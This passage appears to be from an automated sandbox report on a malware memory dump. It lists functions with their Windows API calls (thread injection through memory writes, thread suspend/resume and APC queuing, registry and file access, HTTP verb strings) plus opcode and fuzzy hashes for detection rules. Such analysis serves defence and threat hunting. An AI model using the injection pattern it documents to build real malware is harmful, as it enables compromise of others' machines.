Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: 0401D670A08B048FCB44EF69D0C8569BBE1FB58311B10067FE949C7796DB71D885CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00B7CCA0, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 00B7CCBF

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 3f2a82dcf9ff75e792bad1dcc2e5ed508050df83e28b3dd4d81e6d546fa6ee8d
Instruction ID: bb2534c714de02123724abc84d6cb5cf6052c434e8b1f235d1ae0c6325c49292
Opcode Fuzzy Hash: 3f2a82dcf9ff75e792bad1dcc2e5ed508050df83e28b3dd4d81e6d546fa6ee8d
Instruction Fuzzy Hash: 69E09A70714A444BEB10AFB888C823836D0F788305F20487DE85AC3360D629C852A282

Uniqueness

Uniqueness Score: -1.00%

Function 00B83830, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 00B8384F

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 85032ad9a9dd339a53993ae2441a8bbbfc633b83b0a06364b991555090b07627
Instruction ID: 3e0c11fdb8d20ecc529516222407317df51af906654c6f6f271076ebac5e65dd
Opcode Fuzzy Hash: 85032ad9a9dd339a53993ae2441a8bbbfc633b83b0a06364b991555090b07627
Instruction Fuzzy Hash: 34E01A34B15A454BEB046BB988C927972E1F788B05F2048B9F945C7270D769C9848742

Uniqueness

Uniqueness Score: -1.00%

Function 00B727E8, Relevance: 6.2, APIs: 4, Instructions: 237
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE ref: 00B72908
ResumeThread.KERNELBASE ref: 00B72946
SuspendThread.KERNELBASE ref: 00B7296A
VirtualProtectEx.KERNELBASE ref: 00B729E8

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: ProtectThreadVirtual$ResumeSuspend
String ID:
API String ID: 3483329683-0
Opcode ID: 912752427acc2773dc81b88a95aedc23f4bd7857b4c9cbc1eabf0f137d43b05d
Instruction ID: 46186d40f2cfc25fc736a5389a30728c5eec1a11a687e21570129fc9fc768255
Opcode Fuzzy Hash: 912752427acc2773dc81b88a95aedc23f4bd7857b4c9cbc1eabf0f137d43b05d
Instruction Fuzzy Hash: 5561B13061CB088FDB69EB28E8957AA73E5FB98305F00456DE59EC3291DE34D9418B86

Uniqueness

Uniqueness Score: -1.00%

Function 00B8E8C8, Relevance: 6.1, APIs: 4, Instructions: 146
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 00B8E999
SetFilePointer.KERNELBASE ref: 00B8E9B3
ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B96B1C), ref: 00B8E9D5
FindCloseChangeNotification.KERNELBASE ref: 00B8E9F0

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: d48e66415ee8c958f108398a66507d7349109b7993f4cd815dda9dd15392f6da
Instruction ID: 071235591b880daf650858d0bc4f3ca59a11d20442e009e84bd57248fd163ca0
Opcode Fuzzy Hash: d48e66415ee8c958f108398a66507d7349109b7993f4cd815dda9dd15392f6da
Instruction Fuzzy Hash: 16411030218A084FDB58EF68D8C5A6577E1F788315B2446ADE19BC7276DF74D843C781

Uniqueness

Uniqueness Score: -1.00%

Function 00B90F8C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B9A864: RegCreateKeyA.ADVAPI32 ref: 00B9A887

RegQueryValueExA.KERNELBASE ref: 00B90FF5

Strings

(, xrefs: 00B91001
(, xrefs: 00B9103D

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: CreateQueryValue
String ID: ($(
API String ID: 2711935003-222463766
Opcode ID: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
Instruction ID: 224b61f9b1d1a007aecd044508769a86ad8fff55b7a8922e3c56bb58bd03e22d
Opcode Fuzzy Hash: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
Instruction Fuzzy Hash: A631E9346187498FF705EF58EC997A5B3E1F798304F008A6ED44AC3261DB7D9588DB02

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1310, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00BA144D

Strings

H, xrefs: 00BA1334

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: ea8b0be554912eee910b5f6e76d5c63edd561062f2e3a805656d28eae44b2b83
Instruction ID: 9bed795f0ac56d342ed7e6e9c0b9cb3d3a716afc8f016fd4a758c5aa41d4b0d2
Opcode Fuzzy Hash: ea8b0be554912eee910b5f6e76d5c63edd561062f2e3a805656d28eae44b2b83
Instruction Fuzzy Hash: C4A1603050CB0A8FE755EF5CD8896A677E1FBA9305F004A6ED84AC7261EF34D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B9FEB8, Relevance: 3.2, APIs: 2, Instructions: 202
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B91458: VirtualProtect.KERNELBASE ref: 00B9148B

VirtualProtect.KERNELBASE ref: 00B9FFD6
VirtualProtect.KERNELBASE ref: 00B9FFF9

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
Instruction ID: 31509c53179a530ebe3f53ad4faf9eaa25b2370d78faab507ac73a01eb59ae52
Opcode Fuzzy Hash: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
Instruction Fuzzy Hash: 04517E70618B098FDB44EF29D889B29B7E1FB9C311F1005AEE44EC3261DB34E945CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00B96E1C, Relevance: 3.1, APIs: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrRChrA.KERNELBASE ref: 00B96E7A
RtlAddVectoredContinueHandler.NTDLL ref: 00B96F6E

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: 18d8ac82230bdfc4302373f1128c0f5960e1e63dc188b60f3db038388c3e2014
Instruction ID: db5978cbb9f41da97b2adb3e0c3ce9bac1d0c6b156b1cf1e5db5402357afdd43
Opcode Fuzzy Hash: 18d8ac82230bdfc4302373f1128c0f5960e1e63dc188b60f3db038388c3e2014
Instruction Fuzzy Hash: 5141D730608A098FEF54EF78A8987AA77E1FB98305B45857ED45AC3271DF38C905CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00B78A58, Relevance: 3.1, APIs: 2, Instructions: 106
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00B78AB2
RegCloseKey.KERNELBASE ref: 00B78B2B

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: 0bc493057bba55174271d39b91fef6ffa0c4270635545858b5e3c13c28f28606
Instruction ID: 6a3bcc02a4d5dc3e2c66a351ef4206478bba9bdeafe85d15d016f1fe7c56bda3
Opcode Fuzzy Hash: 0bc493057bba55174271d39b91fef6ffa0c4270635545858b5e3c13c28f28606
Instruction Fuzzy Hash: A7318070618B4C8FDB54EF28E88495AB3E5FB98300B414A6EE44EC3255EF34D944CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B936DC, Relevance: 3.1, APIs: 2, Instructions: 101
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.KERNELBASE ref: 00B9371F
RegQueryValueExA.KERNELBASE ref: 00B937A3

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2d61ef76a0f9e6cd2723d50ffb87ea22aa6033d0a4024559b1a73c32d09c5853
Instruction ID: 8db27cbb4413be9bd08a92f4b6d684b1745ca73d5638319485e3cb3a6373792b
Opcode Fuzzy Hash: 2d61ef76a0f9e6cd2723d50ffb87ea22aa6033d0a4024559b1a73c32d09c5853
Instruction Fuzzy Hash: 8C318D7161CB088FDB48EF58D8C9A66B7E1FBA8311F11456EE849C3252DF34ED418B86

Uniqueness

Uniqueness Score: -1.00%

Function 00B8076C, Relevance: 3.1, APIs: 2, Instructions: 97registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A864: RegCreateKeyA.ADVAPI32 ref: 00B9A887

RegQueryValueExA.KERNELBASE ref: 00B807C3
RegCloseKey.KERNELBASE ref: 00B80833

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: CloseCreateQueryValue
String ID:
API String ID: 4083198587-0
Opcode ID: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
Instruction ID: 622143fb91b31246beaefc27849fedf937af71170f1ea1f57b5064a0686e5a78
Opcode Fuzzy Hash: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
Instruction Fuzzy Hash: 7A212C34718B088FE794FF29E88966677E1FB9C351F10456AA84DC3261EB34D885CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B9A864, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 00B9A887
RegOpenKeyA.ADVAPI32 ref: 00B9A894

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
Instruction ID: 098a7026994c20e78fb5c93fef0379f2404833804403dc78a80ca69c9576b97b
Opcode Fuzzy Hash: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
Instruction Fuzzy Hash: CA018030618A488FDB54EB5C94C866ABBE1FBE8301F10446EE88DC3365DAB5C9418783

Uniqueness

Uniqueness Score: -1.00%

Function 00B910CC, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00B910FC
QueueUserAPC.KERNELBASE ref: 00B91113

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: c5f73e2456696368beb962f5df60b520ee6541a707c920c0f1f52e72b2ec33b6
Instruction ID: 81ec9eb57f084c14967b5e5cff290b3fed0b186e5c140ddfb05b0aec323aadfa
Opcode Fuzzy Hash: c5f73e2456696368beb962f5df60b520ee6541a707c920c0f1f52e72b2ec33b6
Instruction Fuzzy Hash: CA017531714A194FAF44EF2CA84D77977E2EBAC711704857AE509C32B0DB34DC428B81

Uniqueness

Uniqueness Score: -1.00%

Function 00B87DD8, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00B87F24

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
Instruction ID: b510b78220744653e9704a3ad389f21ea1f1b9ea7298194fdddb18158124ae25
Opcode Fuzzy Hash: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
Instruction Fuzzy Hash: 1161633061CE099FD794EF18D885A66B7E1FB6C305B60459EE84AC3261DF34EC41CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B91BA4, Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 00B91C48

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3c5b31f2ade86ff256e9c3c63348cc97b153446f68cd2a262a3ba859843ab9a0
Instruction ID: 0c5730fa61c6222e6493de343ee31c8f5801ecf9b523ec2bc4e014c41e798caf
Opcode Fuzzy Hash: 3c5b31f2ade86ff256e9c3c63348cc97b153446f68cd2a262a3ba859843ab9a0
Instruction Fuzzy Hash: 70314F7060CB084FDB58EF1CD885665B7E1FB99311F10466EE84DC3261DA70EC418B86

Uniqueness

Uniqueness Score: -1.00%

Function 00B7D064, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 00B7D141

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 52f1519f99e7b6274678f0f96dd7df39cf1b8b21fb562168254a445fe9a10dfd
Instruction ID: 0adb4dc801df6d008924a4c6b0a3bdd5e10f38a2bc812736980a0212cae89a95
Opcode Fuzzy Hash: 52f1519f99e7b6274678f0f96dd7df39cf1b8b21fb562168254a445fe9a10dfd
Instruction Fuzzy Hash: BC3150303586858FAB69EF29ECD592A73E2FB983407645079A45BC3651DF38EC03CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B87910, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 00B879B2

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: d4ddd70a20fe12c0bfca40bb4ed08bb38bc6dfc5d20d157000875d94b5c8c612
Instruction ID: 94ef905e2d267f30f40e07c400a6f03914d86653977c4c152c47daa40866e50c
Opcode Fuzzy Hash: d4ddd70a20fe12c0bfca40bb4ed08bb38bc6dfc5d20d157000875d94b5c8c612
Instruction Fuzzy Hash: C721833071890C4FDB98EF69A895679B3E2F798301B20456DE55FC3261DF28DC56C782

Uniqueness

Uniqueness Score: -1.00%

Function 00B91458, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00B9148B

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
Instruction ID: e5a557da5dc821d48062cd15ceb0248ac0790d445d6c06908f97b523be193d2c
Opcode Fuzzy Hash: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
Instruction Fuzzy Hash: 97117F3120CA088FAF18EF59A8850A5B7E5EB9C316700497DE94EC3355EA30ED05CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B8638C, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A864: RegCreateKeyA.ADVAPI32 ref: 00B9A887

RegQueryValueExA.KERNELBASE ref: 00B863E2

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: CreateQueryValue
String ID:
API String ID: 2711935003-0
Opcode ID: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
Instruction ID: ca7bc96850ae81fc21dc908e7c60c96869a85faeb983c8c516ce98ff46f03867
Opcode Fuzzy Hash: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
Instruction Fuzzy Hash: 2D21603011CB488FEB55EF64D888A6AB7E1FB98305F50096EF48AC3260EBB4D545CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00B7FB90, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 00B83830: NtWriteVirtualMemory.NTDLL ref: 00B8384F

VirtualProtectEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B7FBE4

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: Virtual$MemoryProtectWrite
String ID:
API String ID: 1789425917-0
Opcode ID: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
Instruction ID: da4e9212ed03563fb6d072b84d39b3bd6fd29b6cf2aeea0ef1eb79574d365bf6
Opcode Fuzzy Hash: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
Instruction Fuzzy Hash: 12015A70618B088FCB48EF98A0C552AB7E0EB9C310B4045AEE84DC7356CA70DD45CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00B7A92C, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00B7A97D

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
Instruction ID: a72c4c2bb37b7edcd7ede9386c0ac3a528dc7fcec7d305ccc6292a396aeea1ba
Opcode Fuzzy Hash: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
Instruction Fuzzy Hash: F6F06235318B494BEB9CDF69D488A2EB7E1FBD8301F54992DB64AC3254DF74C8058B02

Uniqueness

Uniqueness Score: -1.00%

Function 00B92E50, Relevance: 1.5, APIs: 1, Instructions: 237stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32 ref: 00B92F7D

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-0
Opcode ID: 1608627adbaccf2637d2de6840cab0dcfe8de2003ac308ffa53b0243ab2e23b6
Instruction ID: a8e86f8f7a0d01a36c672041ab43f2287e59b4031ad7054791236eb315e76aae
Opcode Fuzzy Hash: 1608627adbaccf2637d2de6840cab0dcfe8de2003ac308ffa53b0243ab2e23b6
Instruction Fuzzy Hash: 2261717061CB499FCB58DF18C885A7AB7F1FB98714F14467EE48A83211DB30E956CB82

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B8B520, Relevance: 8.2, Strings: 6, Instructions: 654COMMON

Download Yara Rule

Strings

POST, xrefs: 00B8B56C
PUT , xrefs: 00B8B564
GET , xrefs: 00B8B55C
OPTI, xrefs: 00B8B574
GET , xrefs: 00B8B877
OPTI, xrefs: 00B8B87F

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID: GET $GET $OPTI$OPTI$POST$PUT
API String ID: 0-647159250
Opcode ID: f92ce9f8b422821a734d10ebff8381a99305391ad42a77ecb7337dd8f9eaa649
Instruction ID: d82dbf8b094a2e0aa6d7b2a481a4fc40f082d374c7917456e7a883ef8c3eb4cc
Opcode Fuzzy Hash: f92ce9f8b422821a734d10ebff8381a99305391ad42a77ecb7337dd8f9eaa649
Instruction Fuzzy Hash: C212A730218B098FDB69FF38D899AA673E1FB99311F14456DD48AC3265DF34E846CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B8F770, Relevance: 4.2, Strings: 3, Instructions: 490COMMON

Download Yara Rule

Strings

rLoa, xrefs: 00B8F9C2
rGet, xrefs: 00B8F9EF
~, xrefs: 00B8FB5E

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID: rGet$rLoa$~
API String ID: 0-56615508
Opcode ID: 378cad44ec98ef4833cc9a3360bd655300b258c4a04a6e08fc69adcab72a772a
Instruction ID: 5a06b479a4920fc64bc8c4f2c70aeac5a988cc00a5a44f7254f77aea0a28729d
Opcode Fuzzy Hash: 378cad44ec98ef4833cc9a3360bd655300b258c4a04a6e08fc69adcab72a772a
Instruction Fuzzy Hash: 5CE1E930618B0A8FD728EF68D8856B677E1FB98310F14457DD48BC3265EB34D846C782

Uniqueness

Uniqueness Score: -1.00%

Function 00B80CC0, Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

P, xrefs: 00B80DA4
K, xrefs: 00B80DAC

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID: K$P
API String ID: 0-420285281
Opcode ID: 0c69b491a1760776bd87aaff28f67e02088900d39399d5c6fe952f532f782f14
Instruction ID: f7eaad848051bf68459280f01999907c4214dd4fe7b07ecfde6d8b44a3a12db0
Opcode Fuzzy Hash: 0c69b491a1760776bd87aaff28f67e02088900d39399d5c6fe952f532f782f14
Instruction Fuzzy Hash: 5941B23151CB88CFCB85EF5C848461BBBE0FBA9305F140A9DE489C7252C774CA49C792

Uniqueness

Uniqueness Score: -1.00%

Function 00B89380, Relevance: 2.2, Strings: 1, Instructions: 932COMMON

Download Yara Rule

Strings

W, xrefs: 00B893E2

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 0911aeda453c00f3beff6356c4c5d3e787abdfebae3c0cfd7666e2a7026e44ac
Instruction ID: e884ce8618f440503380ab072668f2fdb5c75b9f7b832f6bbff7a9b81c85a5a8
Opcode Fuzzy Hash: 0911aeda453c00f3beff6356c4c5d3e787abdfebae3c0cfd7666e2a7026e44ac
Instruction Fuzzy Hash: 1A429131718A188FDB68FF68DCC95B973E2E799300B18456DD48BC3265EE34E946C782

Uniqueness

Uniqueness Score: -1.00%

Function 00B9AFB8, Relevance: 2.2, Strings: 1, Instructions: 912COMMON

Download Yara Rule

Strings

@, xrefs: 00B9B329

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 5314d47ac38499b3761c766e81e2f58df1e2a23380e3b59c62fbc0fb59a0bd70
Instruction ID: 6b38b3e6fd17e5f4a8298b5f41dc79600d5bb535be4bbfe3d7f440e99117cf41
Opcode Fuzzy Hash: 5314d47ac38499b3761c766e81e2f58df1e2a23380e3b59c62fbc0fb59a0bd70
Instruction Fuzzy Hash: BF529930618B498FEB64EF28E899B6A77E1FB98301F44857DD48AC3261DF78D941CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00B76D08, Relevance: 1.6, Strings: 1, Instructions: 346COMMON

Download Yara Rule

Strings

vids, xrefs: 00B76E0E

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID: vids
API String ID: 0-3767230166
Opcode ID: 6d10290c3cc2fe7ebb11d1d4ac6b8d0cf8604d31bbb35474c2630ee1a5c41697
Instruction ID: 06c5b4078834785fa5f9d34f8d04333eddbdc6fc8733d2b94101fac20946d8bc
Opcode Fuzzy Hash: 6d10290c3cc2fe7ebb11d1d4ac6b8d0cf8604d31bbb35474c2630ee1a5c41697
Instruction Fuzzy Hash: CBC14C7161C7448FD768EF28C455BAAB7E1FB95311F10896DE49AC3261DF34E806CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B78B5C, Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

P, xrefs: 00B78BFB

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 8259038c905ca743461412156db47d71196d6797425a6d704451adbb7f6b3f95
Instruction ID: c19f389c5c95411f8bffe33ff55f47e70379d8d86458d789d56ef2c4401bd978
Opcode Fuzzy Hash: 8259038c905ca743461412156db47d71196d6797425a6d704451adbb7f6b3f95
Instruction Fuzzy Hash: C8A1E230648A098FEB65EF2CD88976A73E5FB98301F14816DD45EC32A1DF38D846CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00B83CE0, Relevance: 1.0, Instructions: 982COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929d1a17d79467dad19b0335158462087982ef3d82f51982b2739965ec0533ad
Instruction ID: 95cb6908c4cdc7c9aa71a574db5ee373aa371b92b70e0b9a891d551ae6b11829
Opcode Fuzzy Hash: 929d1a17d79467dad19b0335158462087982ef3d82f51982b2739965ec0533ad
Instruction Fuzzy Hash: AF426B767B82804B974CC918DCA36F932DAE7C631E71CA43DE9C7C6247EA29D5078948

